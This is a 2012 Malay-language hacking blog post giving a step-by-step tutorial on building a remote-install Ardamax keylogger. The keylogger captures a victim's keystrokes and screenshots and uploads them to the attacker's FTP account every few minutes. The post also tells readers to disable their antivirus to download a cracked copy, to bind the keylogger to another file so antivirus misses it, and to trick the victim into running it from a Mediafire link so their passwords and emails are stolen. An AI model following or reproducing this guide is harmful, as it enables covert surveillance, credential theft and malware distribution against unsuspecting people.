Friday, 20 January 2012

Tutorial Ardamax Keylogger! (Bergambar)

UPDATE 3/7/2012 :
Link download telah di-UPDATE.Selamat men-download!




Assalamualaikum dan salam 1Malaysia.Entry kali ini aku nak ajar korang cara nak menggunakan ardamax keylogger.dengar nama pun dah tau kegunaannya kan?iaitu untuk spy computer mangsa korang dan untuk mendapatkan keystroke(apa yang di-type oleh mangsa).pendek kata boleh dapatkan password dan email mangsa. xD

CREDIT TO MR. HAC.

SUMBER ASAL : My Hackers Are Here
TELAH DIOLAH OLEH AKU :D

Baiklah tanpa berlenggah lagi jom mula.
1. First sekali apa yang diperlukan :

a) Ardamax Keylogger
    Download : 
http://www.mediafire.com/?70bpz2nl4cot2o7

note : korang kena disable/tutup antivirus korang untuk download file ni.ini kerana antivirus akan detect.

b) Akaun Ftp - korang boleh buat secara percuma di Drivehq



c) OTAK! xD



2. Baiklah setelah selesai download semuanya, install Ardamax Keylogger di computer anda.Nama file tersebut ialah setup_akl.exe.

3. Selepas install Ardamax Keylogger, klik kanan pada ikon di system tray dan pilih 'Enter registration key'. masukkan maklumat yang diperlukan (ada disertakan dalam fail yang korang muat download). Rujuk gambar di bawah :


4. Lepas tu click pada ikon dan pilih remote installation, dan klik next dua kali. tandakan semua kotak seperti yang ditunjukkan dan klik next. Rujuk gambar dibawah :






5. Klik enable dan masukkan kata laluan supaya takda orang yang dapat bukak keylogger korang. click next sebanyak 3 kali dan tandakan send logs every, setkan masa sebagai contoh 5 minit, pilih Ftp sebagai 'delivery method', klik next.Rujuk gambar dibawah :





6. Masukkan semua maklumat akaun Ftp korang yang telah dibuat sebentar tadi, klik next.

Contoh:
Ftp host - ftp.drivehq.com  
Remote folder -/logs 
Username - test

Rujuk gambar dibawah :



7. Ok..sekarang tandakan kesemua kotak, klik next. Setkan masa untuk 'capture screenshot'. klik next, dan tukarkan ikon kepada ikon yang korang mahu, klik next, dan klik Finish. 
Gambar :


8. Baiklah kemudian korang tengok dalam kotak "keylogger engine path".ada bagi link directory kan?situ tempat keylogger korang akan di-save.bermakna bila dah siap,korang cuma perlu ambil keylogger korang dalam tu.BUKAN FILE SETUP_AKL.EXE!


9. Baiklah dah siap pun keylogger korang!!woohoo!!Tapi belum habis lagi!hehe.Langkah seterusnya ialah untuk "bind" keylogger korang dengan file lain supaya antivirus tidak akan detect.
Tengok tutorial :
Binder Tool Untuk Elakkan Keylogger Dikesan Oleh AntiVirus!

11. Baiklah Lepas dah siap semua korang bolehlah upload keylogger korang yang telah siap di-bind dengan file lain ke dalam free file hosting.Recomended : http://www.mediafire.com

12. Akhir sekali korang hantar lah link mediafire korang tu kepada mangsa.dan suruh lah mangsa download file korang tu.Sebaik sahaja mangsa run/buka file tu secara automatik segala keystroke mangsa akan dihantar ke account FTP korang tadi.

11. ENJOY!!

Itu saja untuk tuto kali ini.Assalamualaikum....



Item Reviewed: Tutorial Ardamax Keylogger! (Bergambar) Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com